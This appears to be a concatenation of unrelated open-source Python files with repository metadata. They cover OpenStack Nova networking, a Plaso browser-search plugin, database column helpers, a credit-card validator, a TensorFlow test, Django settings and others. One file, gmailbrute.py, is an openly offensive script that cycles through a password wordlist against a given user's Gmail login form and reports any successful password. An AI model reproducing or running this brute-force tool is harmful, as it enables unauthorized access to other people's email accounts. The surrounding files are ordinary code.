def associate(self, context, network_uuid, host=base_api.SENTINEL,
project=base_api.SENTINEL):
"""Associate or disassociate host or project to network."""
network = self.get(context, network_uuid)
if host is not base_api.SENTINEL:
if host is None:
objects.Network.disassociate(context, network.id,
host=True, project=False)
else:
network.host = host
network.save()
if project is not base_api.SENTINEL:
if project is None:
objects.Network.disassociate(context, network.id,
host=False, project=True)
else:
objects.Network.associate(context, project,
network_id=network.id, force=True)
@wrap_check_policy
def get_instance_nw_info(self, context, instance, **kwargs):
"""Returns all network info related to an instance."""
result = self._get_instance_nw_info(context, instance)
# NOTE(comstud): Don't update API cell with new info_cache every
# time we pull network info for an instance. The periodic healing
# of info_cache causes too many cells messages. Healing the API
# will happen separately.
base_api.update_instance_cache_with_nw_info(self, context, instance,
result, update_cells=False)
return result
def _get_instance_nw_info(self, context, instance):
"""Returns all network info related to an instance."""
flavor = flavors.extract_flavor(instance)
args = {'instance_id': instance['uuid'],
'rxtx_factor': flavor['rxtx_factor'],
'host': instance['host'],
'project_id': instance['project_id']}
nw_info = self.network_rpcapi.get_instance_nw_info(context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def validate_networks(self, context, requested_networks, num_instances):
"""validate the networks passed at the time of creating
the server.
Return the number of instances that can be successfully allocated
with the requested network configuration.
"""
if requested_networks:
self.network_rpcapi.validate_networks(context,
requested_networks)
# Neutron validation checks and returns how many of num_instances
# instances can be supported by the quota. For Nova network
# this is part of the subsequent quota check, so we just return
# the requested number in this case.
return num_instances
def create_pci_requests_for_sriov_ports(self, context,
pci_requests,
requested_networks):
"""Check requested networks for any SR-IOV port request.
Create a PCI request object for each SR-IOV port, and add it to the
pci_requests object that contains a list of PCI request object.
"""
# This is NOOP for Nova network since it doesn't support SR-IOV.
pass
@wrap_check_policy
def get_instance_uuids_by_ip_filter(self, context, filters):
"""Returns a list of dicts in the form of
{'instance_uuid': uuid, 'ip': ip} that matched the ip_filter
"""
return self.network_rpcapi.get_instance_uuids_by_ip_filter(context,
filters)
@wrap_check_policy
def get_dns_domains(self, context):
"""Returns a list of available dns domains.
These can be used to create DNS entries for floating ips.
"""
return self.network_rpcapi.get_dns_domains(context)
@wrap_check_policy
def add_dns_entry(self, context, address, name, dns_type, domain):
"""Create specified DNS entry for address."""
args = {'address': address,
'name': name,
'dns_type': dns_type,
'domain': domain}
return self.network_rpcapi.add_dns_entry(context, **args)
@wrap_check_policy
def modify_dns_entry(self, context, name, address, domain):
"""Create specified DNS entry for address."""
args = {'address': address,
'name': name,
'domain': domain}
return self.network_rpcapi.modify_dns_entry(context, **args)
@wrap_check_policy
def delete_dns_entry(self, context, name, domain):
"""Delete the specified dns entry."""
args = {'name': name, 'domain': domain}
return self.network_rpcapi.delete_dns_entry(context, **args)
@wrap_check_policy
def delete_dns_domain(self, context, domain):
"""Delete the specified dns domain."""
return self.network_rpcapi.delete_dns_domain(context, domain=domain)
@wrap_check_policy
def get_dns_entries_by_address(self, context, address, domain):
"""Get entries for address and domain."""
args = {'address': address, 'domain': domain}
return self.network_rpcapi.get_dns_entries_by_address(context, **args)
@wrap_check_policy
def get_dns_entries_by_name(self, context, name, domain):
"""Get entries for name and domain."""
args = {'name': name, 'domain': domain}
return self.network_rpcapi.get_dns_entries_by_name(context, **args)
@wrap_check_policy
def create_private_dns_domain(self, context, domain, availability_zone):
"""Create a private DNS domain with nova availability zone."""
args = {'domain': domain, 'av_zone': availability_zone}
return self.network_rpcapi.create_private_dns_domain(context, **args)
@wrap_check_policy
def create_public_dns_domain(self, context, domain, project=None):
"""Create a public DNS domain with optional nova project."""
args = {'domain': domain, 'project': project}
return self.network_rpcapi.create_public_dns_domain(context, **args)
@wrap_check_policy
def setup_networks_on_host(self, context, instance, host=None,
teardown=False):
"""Setup or teardown the network structures on hosts related to
instance.
"""
host = host or instance['host']
# NOTE(tr3buchet): host is passed in cases where we need to setup
# or teardown the networks on a host which has been migrated to/from
# and instance['host'] is not yet or is no longer equal to
args = {'instance_id': instance['id'],
'host': host,
'teardown': teardown}
self.network_rpcapi.setup_networks_on_host(context, **args)
def _get_multi_addresses(self, context, instance):
try:
fixed_ips = objects.FixedIPList.get_by_instance_uuid(
context, instance['uuid'])
except exception.FixedIpNotFoundForInstance:
return False, []
addresses = []
for fixed in fixed_ips:
for floating in fixed.floating_ips:
addresses.append(floating.address)
return fixed_ips[0].network.multi_host, addresses
@wrap_check_policy
def migrate_instance_start(self, context, instance, migration):
"""Start to migrate the network of an instance."""
flavor = flavors.extract_flavor(instance)
args = dict(
instance_uuid=instance['uuid'],
rxtx_factor=flavor['rxtx_factor'],
project_id=instance['project_id'],
source_compute=migration['source_compute'],
dest_compute=migration['dest_compute'],
floating_addresses=None,
)
multi_host, addresses = self._get_multi_addresses(context, instance)
if multi_host:
args['floating_addresses'] = addresses
args['host'] = migration['source_compute']
self.network_rpcapi.migrate_instance_start(context, **args)
@wrap_check_policy
def migrate_instance_finish(self, context, instance, migration):
"""Finish migrating the network of an instance."""
flavor = flavors.extract_flavor(instance)
args = dict(
instance_uuid=instance['uuid'],
rxtx_factor=flavor['rxtx_factor'],
project_id=instance['project_id'],
source_compute=migration['source_compute'],
dest_compute=migration['dest_compute'],
floating_addresses=None,
)
multi_host, addresses = self._get_multi_addresses(context, instance)
if multi_host:
args['floating_addresses'] = addresses
args['host'] = migration['dest_compute']
self.network_rpcapi.migrate_instance_finish(context, **args)
|
vmthunder/nova
|
nova/network/api.py
|
Python
|
apache-2.0
| 23,489
| 0.000341
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2013 The Plaso Project Authors.
# Please see the AUTHORS file for details on individual authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A plugin that extracts browser history from events."""
import collections
import logging
import urllib
from plaso import filters
from plaso.analysis import interface
from plaso.lib import event
from plaso.lib import eventdata
def ScrubLine(line):
"""Scrub the line of most obvious HTML codes.
An attempt at taking a line and swapping all instances
of %XX which represent a character in hex with it's
unicode character.
Args:
line: The string that we are about to "fix".
Returns:
String that has it's %XX hex codes swapped for text.
"""
if not line:
return ''
try:
return unicode(urllib.unquote(str(line)), 'utf-8')
except UnicodeDecodeError:
logging.warning(u'Unable to decode line: {0:s}'.format(line))
return line
class FilterClass(object):
"""A class that contains all the parser functions."""
@classmethod
def _GetBetweenQEqualsAndAmbersand(cls, string):
"""Return back string that is defined 'q=' and '&'."""
if 'q=' not in string:
return string
_, _, line = string.partition('q=')
before_and, _, _ = line.partition('&')
if not before_and:
return line
return before_and.split()[0]
@classmethod
def _SearchAndQInLine(cls, string):
"""Return a bool indicating if the words q= and search appear in string."""
return 'search' in string and 'q=' in string
@classmethod
def GoogleSearch(cls, url):
"""Return back the extracted string."""
if not cls._SearchAndQInLine(url):
return
line = cls._GetBetweenQEqualsAndAmbersand(url)
if not line:
return
return line.replace('+', ' ')
@classmethod
def YouTube(cls, url):
"""Return back the extracted string."""
return cls.GenericSearch(url)
@classmethod
def BingSearch(cls, url):
"""Return back the extracted string."""
return cls.GenericSearch(url)
@classmethod
def GenericSearch(cls, url):
"""Return back the extracted string from a generic search engine."""
if not cls._SearchAndQInLine(url):
return
return cls._GetBetweenQEqualsAndAmbersand(url).replace('+', ' ')
@classmethod
def Yandex(cls, url):
"""Return back the results from Yandex search engine."""
if 'text=' not in url:
return
_, _, line = url.partition('text=')
before_and, _, _ = line.partition('&')
if not before_and:
return
yandex_search_url = before_and.split()[0]
return yandex_search_url.replace('+', ' ')
@classmethod
def DuckDuckGo(cls, url):
"""Return back the extracted string."""
if not 'q=' in url:
return
return cls._GetBetweenQEqualsAndAmbersand(url).replace('+', ' ')
@classmethod
def Gmail(cls, url):
"""Return back the extracted string."""
if 'search/' not in url:
return
_, _, line = url.partition('search/')
first, _, _ = line.partition('/')
second, _, _ = first.partition('?compose')
return second.replace('+', ' ')
class AnalyzeBrowserSearchPlugin(interface.AnalysisPlugin):
"""Analyze browser search entries from events."""
NAME = 'browser_search'
# Indicate that we do not want to run this plugin during regular extraction.
ENABLE_IN_EXTRACTION = False
# Here we define filters and callback methods for all hits on each filter.
FILTERS = (
(('url iregexp "(www.|encrypted.|/)google." and url contains "search"'),
'GoogleSearch'),
('url contains "youtube.com"', 'YouTube'),
(('source is "WEBHIST" and url contains "bing.com" and url contains '
'"search"'), 'BingSearch'),
('url contains "mail.google.com"', 'Gmail'),
(('source is "WEBHIST" and url contains "yandex.com" and url contains '
'"yandsearch"'), 'Yandex'),
('url contains "duckduckgo.com"', 'DuckDuckGo')
)
def __init__(self, pre_obj, incoming_queue, outgoing_queue):
"""Constructor for the browser history plugin."""
super(AnalyzeBrowserSearchPlugin, self).__init__(
pre_obj, incoming_queue, outgoing_queue)
self._filter_dict = {}
self._counter = collections.Counter()
for filter_str, call_back in self.FILTERS:
filter_obj = filters.GetFilter(filter_str)
call_back_obj = getattr(FilterClass, call_back, None)
if filter_obj and call_back_obj:
self._filter_dict[filter_obj] = (call_back, call_back_obj)
def ExamineEvent(self, event_object):
"""Take an EventObject and send it through analysis."""
# This event requires an URL attribute.
url_attribute = getattr(event_object, 'url', None)
if not url_attribute:
return
# Check if we are dealing with a web history event.
source, _ = eventdata.EventFormatterManager.GetSourceStrings(event_object)
if source != 'WEBHIST':
return
for filter_obj, call_backs in self._filter_dict.items():
call_back_name, call_back_object = call_backs
if filter_obj.Match(event_object):
returned_line = ScrubLine(call_back_object(url_attribute))
if not returned_line:
continue
self._counter[u'{}:{}'.format(call_back_name, returned_line)] += 1
def CompileReport(self):
"""Compiles a report of the analysis.
Returns:
The analysis report (instance of AnalysisReport).
"""
report = event.AnalysisReport()
results = {}
for key, count in self._counter.iteritems():
search_engine, _, search_term = key.partition(':')
results.setdefault(search_engine, {})
results[search_engine][search_term] = count
report.report_dict = results
lines_of_text = []
for search_engine, terms in sorted(results.items()):
lines_of_text.append(u' == ENGINE: {0:s} =='.format(search_engine))
for search_term, count in sorted(
terms.iteritems(), key=lambda x: (x[1], x[0]), reverse=True):
lines_of_text.append(u'{0:d} {1:s}'.format(count, search_term))
# An empty string is added to have SetText create an empty line.
lines_of_text.append(u'')
report.SetText(lines_of_text)
return report
|
iwm911/plaso
|
plaso/analysis/browser_search.py
|
Python
|
apache-2.0
| 6,727
| 0.008771
|
import numpy as np
import pandas as pd
from lazy_property import LazyProperty
from . import _describe_template
from .plot import Plotter
from .. import bin_counts
from .. import numeric_datatypes, _pretty_print
from ..util import seaborn_required
class Column(object):
"""
In Pandas, a column of a DataFrame is represented as a Series.
Similarly, a column in a database table is represented by
an object from this class.
Note that the Series represented by these columns have the default index (ie non-negative, consecutive integers starting at zero). Thus, for the portion of the Pandas Series API mocked here, we need not worry about multilevel (hierarchical) indices.
"""
def __init__(self, name, parent_table):
"""
:param str name: The name of the column. Required.
:param pg_utils.table.Table parent_table: The table to which this column belongs. Required.
"""
self.parent_table = parent_table
self.name = name
self.is_numeric = parent_table._all_column_data_types[name] in numeric_datatypes
self.plot = Plotter(self)
def select_all_query(self):
"""
Provides the SQL used when selecting everything from this column.
:return: The SQL statement.
:rtype: str
"""
return "select {} from {}".format(self, self.parent_table)
def sort_values(self, ascending=True, limit=None, **sql_kwargs):
"""
Mimics the method `pandas.Series.sort_values <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.sort_values.html#pandas.Series.sort_values>`_.
:param int|None limit: Either a positive integer for the number of rows to take or ``None`` to take all.
:param bool ascending: Sort ascending vs descending.
:param dict sql_kwargs: A dictionary of keyword arguments passed into `pandas.read_sql <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_sql.html>`_.
:return: The resulting series.
:rtype: pandas.Series
"""
if limit is not None and (not isinstance(limit, int) or limit <= 0):
raise ValueError("limit must be a positive integer or None (got {})".format(limit))
sql = self.select_all_query() + " order by 1"
if not ascending:
sql += " desc"
if limit is not None:
sql += " limit {}".format(limit)
return pd.read_sql(sql, self.parent_table.conn, **sql_kwargs)[self.name]
def unique(self):
"""
Returns an array of unique values in this column. Includes ``null`` (represented as ``None``).
:return: The unique values.
:rtype: np.array
"""
cur = self.parent_table.conn.cursor()
cur.execute("select distinct {} from {}".format(self, self.parent_table))
return np.array([x[0] for x in cur.fetchall()])
def hist(self, **kwargs):
return self.plot.hist(**kwargs)
def head(self, num_rows=10):
"""
Fetches some values of this column.
:param int|str num_rows: Either a positive integer number of values or the string `"all"` to fetch all values
:return: A NumPy array of the values
:rtype: np.array
"""
if (isinstance(num_rows, int) and num_rows < 0) or \
num_rows != "all":
raise ValueError("num_rows must be a positive integer or the string 'all'")
query = self.select_all_query()
if num_rows != "all":
query += " limit {}".format(num_rows)
cur = self.parent_table.conn.cursor()
cur.execute(query)
return np.array([x[0] for x in cur.fetchall()])
@LazyProperty
def is_unique(self):
"""
Determines whether or not the values of this column are all unique (ie whether this column is a unique identifier for the table).
:return: Whether or not this column contains unique values.
:rtype: bool
"""
cur = self.parent_table.conn.cursor()
cur.execute("""select {}
from {}
group by 1 having count(1) > 1""".format(self, self.parent_table))
return cur.fetchone() is None
@LazyProperty
def dtype(self):
"""
The ``dtype`` of this column (represented as a string).
:return: The ``dtype``.
:rtype: str
"""
return self.parent_table._all_column_data_types[self.name]
def _get_describe_query(self, percentiles=None, type_="continuous"):
if type_.lower() not in ["continuous", "discrete"]:
raise ValueError("The 'type_' parameter must be 'continuous' or 'discrete'")
if not self.is_numeric:
return None
if percentiles is None:
percentiles = [0.25, 0.5, 0.75]
elif not bool(percentiles):
percentiles = []
if not isinstance(percentiles, (list, tuple)):
percentiles = [percentiles]
if any([x < 0 or x > 1 for x in percentiles]):
raise ValueError(
"The `percentiles` attribute must be None or consist of numbers between 0 and 1 (got {})".format(
percentiles))
percentiles = sorted([float("{0:.2f}".format(p)) for p in percentiles if p > 0])
suffix = "cont" if type_.lower() == "continuous" else "desc"
query = _describe_template.render(column=self, percentiles=percentiles,
suffix=suffix, table=self.parent_table)
if self.parent_table.debug:
_pretty_print(query)
return query
def describe(self, percentiles=None, type_="continuous"):
"""
This mocks the method `pandas.Series.describe`, and provides
a series with the same data (just calculated by the database).
:param None|list[float] percentiles: A list of percentiles to evaluate (with numbers between 0 and 1). If not specified, quartiles (0.25, 0.5, 0.75) are used.
:param str type_: Specifies whether the percentiles are to be taken as discrete or continuous. Must be one of `"discrete"` or `"continuous"`.
:return: A series returning the description of the column, in the same format as ``pandas.Series.describe``.
:rtype: pandas.Series
"""
if percentiles is None:
percentiles = [0.25, 0.5, 0.75]
cur = self.parent_table.conn.cursor()
cur.execute(self._get_describe_query(percentiles=percentiles, type_=type_))
index = ["count", "mean", "std_dev", "minimum"] + \
["{}%".format(int(100 * p)) for p in percentiles] + \
["maximum"]
return pd.Series(cur.fetchone()[1:], index=index)
@seaborn_required
def distplot(self, bins=None, **kwargs):
"""
Produces a ``distplot``. See `the seaborn docs <http://stanford.edu/~mwaskom/software/seaborn/generated/seaborn.distplot.html>`_ on ``distplot`` for more information.
Note that this requires Seaborn in order to function.
:param int|None bins: The number of bins to use. If unspecified, the `Freedman-Diaconis rule <https://en.wikipedia.org/wiki/Freedman%E2%80%93Diaconis_rule>`_ will be used to determine the number of bins.
:param dict kwargs: A dictionary of options to pass on to `seaborn.distplot <http://stanford.edu/~mwaskom/software/seaborn/generated/seaborn.distplot.html>`_.
"""
import seaborn
bc = bin_counts.counts(self, bins=bins)
n = sum([entry[2] for entry in bc])
left = np.zeros(n)
right = np.zeros(n)
overall_index = 0
for entry in bc:
for i in range(entry[2]):
left[overall_index] = entry[0]
right[overall_index] = entry[1]
overall_index += 1
# We'll take our overall data points to be in the midpoint
# of each binning interval
# TODO: make this more configurable (left, right, etc)
return seaborn.distplot((left + right) / 2.0, **kwargs)
@LazyProperty
def values(self):
"""
Mocks the method `pandas.Series.values`, returning a simple NumPy array
consisting of the values of this column.
:return: The NumPy array containing the values.
:rtype: np.array
"""
cur = self.parent_table.conn.cursor()
cur.execute(self.select_all_query())
return np.array([x[0] for x in cur.fetchall()])
def _calculate_aggregate(self, aggregate):
query = "select {}({}) from (\n{}\n)a".format(
aggregate, self, self.select_all_query())
cur = self.parent_table.conn.cursor()
cur.execute(query)
return cur.fetchone()[0]
@LazyProperty
def mean(self):
"""
Mocks the ``pandas.Series.mean`` method to give the mean of the values in this column.
:return: The mean.
:rtype: float
"""
return self._calculate_aggregate("avg")
@LazyProperty
def max(self):
"""
Mocks the ``pandas.Series.max`` method to give the maximum of the values in this column.
:return: The maximum.
:rtype: float
"""
return self._calculate_aggregate("max")
@LazyProperty
def min(self):
"""
Mocks the ``pandas.Series.min`` method to give the maximum of the values in this column.
:return: The minimum.
:rtype: float
"""
return self._calculate_aggregate("min")
@LazyProperty
def size(self):
"""
Mocks the ``pandas.Series.size`` property to give a count of the values in this column.
:return: The count.
:rtype: int
"""
return self.parent_table.count
def __str__(self):
return self.name
def __repr__(self):
return "<{} '{}'>".format(self.__class__, self.name)
def __eq__(self, other):
if not isinstance(other, Column):
return False
return self.name == other.name and self.parent_table == other.parent_table
def __ne__(self, other):
return not self.__eq__(other)
|
jackmaney/pg-utils
|
pg_utils/column/base.py
|
Python
|
mit
| 10,187
| 0.002945
|
import re
from calendar import monthrange
import datetime
class Card(object):
"""
A credit card that may be valid or invalid.
"""
# A regexp for matching non-digit values
non_digit_regexp = re.compile(r'\D')
# A mapping from common credit card brands to their number regexps
BRAND_VISA = 'visa'
BRAND_MASTERCARD = 'mastercard'
BRAND_AMEX = 'amex'
BRAND_DISCOVER = 'discover'
BRAND_DANKORT = 'dankort'
BRAND_MAESTRO = 'maestro'
BRAND_DINERS = 'diners'
BRAND_UNKNOWN = u'unknown'
BRANDS = {
BRAND_VISA: re.compile(r'^4\d{12}(\d{3})?$'),
BRAND_MASTERCARD: re.compile(r'''
^(5[1-5]\d{4}|677189)\d{10}$| # Traditional 5-series + RU support
^(222[1-9]|2[3-6]\d{2}|27[0-1]\d|2720)\d{12}$ # 2016 2-series
''', re.VERBOSE),
BRAND_AMEX: re.compile(r'^3[47]\d{13}$'),
BRAND_DISCOVER: re.compile(r'^(6011|65\d{2})\d{12}$'),
BRAND_DANKORT: re.compile(r'^(5019)\d{12}$'),
BRAND_MAESTRO:
re.compile(r'^(?:5[0678]\d\d|6304|6390|67\d\d)\d{8,15}$'),
BRAND_DINERS:
re.compile(r'^3(?:0[0-5]|[68][0-9])[0-9]{11}$'),
}
FRIENDLY_BRANDS = {
BRAND_VISA: 'Visa',
BRAND_MASTERCARD: 'MasterCard',
BRAND_AMEX: 'American Express',
BRAND_DISCOVER: 'Discover',
BRAND_DANKORT: 'Dankort',
BRAND_MAESTRO: 'Maestro',
BRAND_DINERS: 'Diners Club',
}
# Common test credit cards
TESTS = (
'4444333322221111',
'378282246310005',
'371449635398431',
'378734493671000',
'30569309025904',
'38520000023237',
'6011111111111117',
'6011000990139424',
'555555555554444',
'5105105105105100',
'4111111111111111',
'4012888888881881',
'4222222222222',
)
# Stripe test credit cards
TESTS += (
'4242424242424242',
)
def __init__(self, number, month, year, cvc, holder=None):
"""
Attaches the provided card data and holder to the card after removing
non-digits from the provided number.
"""
self.number = self.non_digit_regexp.sub('', number)
self.exp_date = ExpDate(month, year)
self.cvc = cvc
self.holder = holder
def __repr__(self):
"""
Returns a typical repr with a simple representation of the masked card
number and the exp date.
"""
return u'<Card brand={b} number={n}, exp_date={e}>'.format(
b=self.brand,
n=self.mask,
e=self.exp_date.mmyyyy
)
@property
def mask(self):
"""
Returns the credit card number with each of the number's digits but the
first six and the last four digits replaced by an X, formatted the way
they appear on their respective brands' cards.
"""
# If the card is invalid, return an "invalid" message
if not self.is_mod10_valid:
return u'invalid'
# If the card is an Amex, it will have special formatting
if self.brand == self.BRAND_AMEX:
return u'XXXX-XXXXXX-X{e}'.format(e=self.number[11:15])
# All other cards
return u'XXXX-XXXX-XXXX-{e}'.format(e=self.number[12:16])
@property
def brand(self):
"""
Returns the brand of the card, if applicable, else an "unknown" brand.
"""
# Check if the card is of known type
for brand, regexp in self.BRANDS.items():
if regexp.match(self.number):
return brand
# Default to unknown brand
return self.BRAND_UNKNOWN
@property
def friendly_brand(self):
"""
Returns the human-friendly brand name of the card.
"""
return self.FRIENDLY_BRANDS.get(self.brand, 'unknown')
@property
def is_test(self):
"""
Returns whether or not the card's number is a known test number.
"""
return self.number in self.TESTS
@property
def is_expired(self):
"""
Returns whether or not the card is expired.
"""
return self.exp_date.is_expired
@property
def is_valid(self):
"""
Returns whether or not the card is a valid card for making payments.
"""
return not self.is_expired and self.is_mod10_valid
@property
def is_mod10_valid(self):
"""
Returns whether or not the card's number validates against the mod10
algorithm (Luhn algorithm), automatically returning False on an empty
value.
"""
# Check for empty string
if not self.number:
return False
# Run mod10 on the number
dub, tot = 0, 0
for i in range(len(self.number) - 1, -1, -1):
for c in str((dub + 1) * int(self.number[i])):
tot += int(c)
dub = (dub + 1) % 2
return (tot % 10) == 0
class ExpDate(object):
"""
An expiration date of a credit card.
"""
def __init__(self, month, year):
"""
Attaches the last possible datetime for the given month and year, as
well as the raw month and year values.
"""
# Attach month and year
self.month = month
self.year = year
# Get the month's day count
weekday, day_count = monthrange(year, month)
# Attach the last possible datetime for the provided month and year
self.expired_after = datetime.datetime(
year,
month,
day_count,
23,
59,
59,
999999
)
def __repr__(self):
"""
Returns a typical repr with a simple representation of the exp date.
"""
return u'<ExpDate expired_after={d}>'.format(
d=self.expired_after.strftime('%m/%Y')
)
@property
def is_expired(self):
"""
Returns whether or not the expiration date has passed in American Samoa
(the last timezone).
"""
# Get the current datetime in UTC
utcnow = datetime.datetime.utcnow()
# Get the datetime minus 11 hours (Samoa is UTC-11)
samoa_now = utcnow - datetime.timedelta(hours=11)
# Return whether the exipred after time has passed in American Samoa
return samoa_now > self.expired_after
@property
def mmyyyy(self):
"""
Returns the expiration date in MM/YYYY format.
"""
return self.expired_after.strftime('%m/%Y')
@property
def mmyy(self):
"""
Returns the expiration date in MM/YY format (the same as is printed on
cards.
"""
return self.expired_after.strftime('%m/%y')
@property
def MMYY(self):
"""
Returns the expiration date in MMYY format
"""
return self.expired_after.strftime('%m%y')
@property
def mm(self):
"""
Returns the expiration date in MM format.
"""
return self.expired_after.strftime('%m')
@property
def yyyy(self):
"""
Returns the expiration date in YYYY format.
"""
return self.expired_after.strftime('%Y')
|
orokusaki/pycard
|
pycard/card.py
|
Python
|
mit
| 7,293
| 0
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for parser module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import textwrap
from tensorflow.contrib.autograph.pyct import parser
from tensorflow.python.platform import test
class ParserTest(test.TestCase):
def test_parse_entity(self):
def f(x):
return x + 1
mod, _ = parser.parse_entity(f)
self.assertEqual('f', mod.body[0].name)
def test_parse_str(self):
mod = parser.parse_str(
textwrap.dedent("""
def f(x):
return x + 1
"""))
self.assertEqual('f', mod.body[0].name)
def test_parse_expression(self):
node = parser.parse_expression('a.b')
self.assertEqual('a', node.value.id)
self.assertEqual('b', node.attr)
if __name__ == '__main__':
test.main()
|
nburn42/tensorflow
|
tensorflow/contrib/autograph/pyct/parser_test.py
|
Python
|
apache-2.0
| 1,514
| 0.003303
|
#!usr/bin/python
#Gmail Brute Forcer
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=3:
print "Usage: ./gmailbrute.py <user> <wordlist>"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com GmailBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server: https://www.gmail.com/"
print "[+] User:",sys.argv[1]
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[1],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen("https://www.gmail.com/")
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["Email"] = sys.argv[1]
form["Passwd"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("Gmail - Inbox", line):
print "\tSuccessful Login:", value
success = value
sys.exit(1)
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login: https://www.gmail.com/"
print "[+] User:",sys.argv[1]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
|
knightmare2600/d4rkc0de
|
bruteforce/gmailbrute.py
|
Python
|
gpl-2.0
| 2,738
| 0.039445
|
#Aditya Joshi
#Enumerating Oriented Gene Ordering
from itertools import permutations,product
from math import fabs
n = int(raw_input())
def make_set(n):
set = []
for x in range(1,n+1):
set += [x]
return set
def plusAndMinusPermutations(items):
for p in permutations(items,len(items)):
for signs in product([-1,1], repeat=len(items)):
yield [a*sign for a,sign in zip(p,signs)]
def array_to_string(list):
string = ""
string += str(list[0]) + " " + str(list[1])
return string
count = 0
for x in plusAndMinusPermutations(make_set(n)):
print array_to_string(x)
count += 1
print count
|
adijo/rosalind
|
old/gene_enumerations.py
|
Python
|
gpl-2.0
| 682
| 0.014663
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from SI import meter, second
gal = 0.01*meter/second**2
# version
__id__ = "$Id: force.py,v 1.1.1.1 2005/03/08 16:13:41 aivazis Exp $"
#
# End of file
|
bmi-forum/bmi-pyre
|
pythia-0.8/packages/pyre/pyre/units/force.py
|
Python
|
gpl-2.0
| 545
| 0
|
from .base import *
import dj_database_url
if os.environ.get('DEBUG') == 'False':
DEBUG = False
else:
DEBUG = True
try:
from .local import *
except ImportError:
pass
ALLOWED_HOSTS = ['*']
DATABASES = {'default': dj_database_url.config()}
SOCIAL_AUTH_YAMMER_KEY = os.environ.get('SOCIAL_AUTH_YAMMER_KEY')
SOCIAL_AUTH_YAMMER_SECRET = os.environ.get('SOCIAL_AUTH_YAMMER_SECRET')
AWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']
STATICFILES_STORAGE = 'core.storage.S3PipelineManifestStorage'
STATIC_URL = 'http://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
AWS_QUERYSTRING_AUTH = False
AWS_S3_FILE_OVERWRITE = True
PIPELINE_JS_COMPRESSOR = 'pipeline.compressors.yuglify.YuglifyCompressor'
PIPELINE_CSS_COMPRESSOR = 'pipeline.compressors.yuglify.YuglifyCompressor'
PIPELINE_YUGLIFY_BINARY = '/app/.heroku/python/bin/yuglify'
|
kave/Face-Off
|
face-off/settings/production.py
|
Python
|
cc0-1.0
| 866
| 0.001155
|
import datetime
import logging
from functools import reduce
from flask_babelpkg import lazy_gettext
from .filters import Filters
log = logging.getLogger(__name__)
class BaseInterface(object):
"""
Base class for all data model interfaces.
Sub class it to implement your own interface for some data engine.
"""
obj = None
filter_converter_class = None
""" when sub classing override with your own custom filter converter """
""" Messages to display on CRUD Events """
add_row_message = lazy_gettext('Added Row')
edit_row_message = lazy_gettext('Changed Row')
delete_row_message = lazy_gettext('Deleted Row')
delete_integrity_error_message = lazy_gettext('Associated data exists, please delete them first')
add_integrity_error_message = lazy_gettext('Integrity error, probably unique constraint')
edit_integrity_error_message = lazy_gettext('Integrity error, probably unique constraint')
general_error_message = lazy_gettext('General Error')
""" Tuple with message and text with severity type ex: ("Added Row", "info") """
message = ()
def __init__(self, obj):
